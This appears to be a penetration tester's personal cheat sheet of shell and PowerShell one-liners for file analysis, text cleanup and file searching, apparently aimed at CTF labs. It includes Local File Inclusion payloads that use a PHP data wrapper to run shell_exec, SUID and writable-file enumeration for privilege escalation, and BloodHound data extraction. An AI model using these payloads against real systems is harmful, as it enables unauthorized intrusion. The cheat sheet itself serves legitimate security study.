Files analysis


checksec --file myfile

file myfile


binwalk -e myfile


foremost myfile
tree output/


strings -n 10 myfile 

hexedit myfile


Local File Inclusion


Using PHP Wrappers

http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
http://10.11.0.22/menu.php?file=c:\windows\system32\drivers\etc\hosts

Write files


# File creation
echo "line1
line2
line3" >> myfile

# How many lines?
wc -l myfile
3 myfile

$ cat myfile 
line1
line2
line3
cat >text<<EOF
hey
yo
EOF

cat text
hey
yo

Show line


sed -n '2271p' test1

Read file

cat etc.txt
awk '{print}' etc.txt

read files in a dir

cat directory/*.txt|less

See a line that contains

awk '/michele/' test1
grep -rni 'michele' test1 -C3

find all non ascii characters

grep -naxv '.*' file.txt

File clean up


Remove duplicate lines

awk '!seen[$0]++' file

lowercase everything

sed 's/.*/\L&/g' file.txt > fileNew.txt

remove duplicates

sort -u pass.txt >> clean_pass.txt

remove space

grep --text -v '^[[:space:]]*$' clean_pass.txt > pass.txt

Remove less than 7 characters words

egrep -xv '.{1,7}' pass.txt

Retrive the last column

echo "Open 192.168.152.119:21" | cut -d ":" -f2 | sed ':a;N;$!ba;s/\n/,/g'

Compare files


echo "A" > file1.txt
➜  echo "B" >> file1.txt
➜  echo "C" >> file1.txt
➜  echo "B" > file2.txt
➜  comm file1.txt file2.txt
A
		B
C
➜ comm -12 file1.txt file2.txt
B
diff -c file1.txt file2.txt
*** file1.txt	2021-09-26 18:04:36.000000000 +0100
--- file2.txt	2021-09-26 18:04:44.000000000 +0100
***************
*** 1,3 ****
- A
  B
- C
--- 1 ----
vimdiff  file1.txt file2.txt

The -1 excludes lines that are only in a.txt, and the -3 excludes lines that are in both. Thus only the lines exclusively in b.txt are output (see man comm or comm –help for details). The output is redirected to c.txt

comm -1 -3 a.txt b.txt > c.txt

If you want the difference between the two files, use diff rather than comm. e.g.

diff -u a.txt b.txt > c.txt

Find files


Find flags

find / '(' -name 'user.txt' -or -name 'root.txt' ')' -exec wc -c {} \; -exec cat {} \; 2>/dev/null

Find suid / guid file

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -type f -perm -4000 2>/dev/null

Find an file with an IP

find / -type f -exec grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" {} \+ 2>/dev/null

Find files owned by the user or writable by anybody

find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq

Find files writable by any group of the user

for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done

Find root owned files in /home folders

find /home -user root 2>/dev/null

Files owned by other users in folders owned by me

for d in find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user $(whoami) 2>/dev/null; do find $d ! -user `whoami` -exec ls -l {} \; 2>/dev/null; done

Files owned by root, readable by me but no world readable

find / -type f -user root ! -perm -o=r 2>/dev/null

Files owned by me or world writable

find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null

Writable files by each group I belong to

for g in `groups`;
      do printf "  Group $g:\n";
      find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
      done
done

Run command on output

find ~/Downloads -type f -name 'file*' -print0 | xargs -0 ls -ail

Retrieve info in a file

head flag.txt; wc flag.txt
find . -type f -name flag.txt -print0 2>/dev/null | xargs -0 egrep '^r[a-zA-Z0-9]*0$'

Read logs

cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
cat access.log | grep 192.168.10.1 | grep '/admin' | sort -u

Copy files only (no dir)

find -maxdepth 1 -type f -exec echo cp {} newlocation/ \;

Find git folder

find . -name .git -type d

Locate all .git config in my current path

find . -name .git -type d -exec echo {}/config \;

Find excluding directories foo and bar

find /dir \( -name foo -prune \) -o \( -name bar -prune \) -o -name "*.sh" -print

???

$(find "$BASEDIR" -name '*.py' -exec grep -H urlopen \{\} \;)

Find by date?

find . -newermt "2016-04-16"
find /path/to/dir -newermt "Feb 07"
find /path/to/dir -newermt "yyyy-mm-dd"

Find modified files on given date

find /path/to/dir -newermt yyyy-mm-dd ! -newermt yyyy-mm-dd -ls

Print all x.pl

find /path/to/dir -newermt "yyyy-mm-dd" -print -type f -iname "*.pl"

Cat all files

find . -type f 2>/dev/null -exec cat {} \;

Find a term in a file

find /dir \( -name node_modules -prune \) -o -name "*.sh" -exec grep --color -Hn "your text to find" {} 2>/dev/null \;

Find specific term in files

grep -rni "term" . -C3

Search php file containing term

find . -name "*.php" -type f -print0 | xargs -0 grep -H "EcrmType::class"

Windows/powershell search files

Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Random


updatedb
locate '\.nse$' | xargs grep categories 

Grep 'version\|smbb'

grep -B 5 open nmap.scan

# Retrieve samaccountname from Bloodhound data with Jq 
cat 1234_users.json | jq '.data[].Properties | .samaccountname + ":" + .description' -r

Actions


Delete empty folder

find . -type d -empty -delete

Find unwanted junk files

find . -name 'Thumbs.db|.DS_Store|*.jpeg' -type f
find . -name '.DS_Store' -type f

Move all non music files

find . -not -name '*.mp3' -not -name '*.m4a' -not -name '*.MP3' -type f -exec mv -f '{}' /Users/DIRTYFILES/. \;

Find a text and replace content

find . -type f -name "*.txt" -print0 | xargs -0 sed -i "s/replacement//g"
#sed -i 's/Database://' Database.kdbx

Create multiple folders

mkdir -p folder/{sub1,sub2}/{sub1,sub2,sub3}

intercept stdout and log to file

cat file | tee -a log | cat > /dev/null`

Sum up all the lines of a file ```bash awk ‘{ sum += $1 } END { print sum }’ sum-me.txt`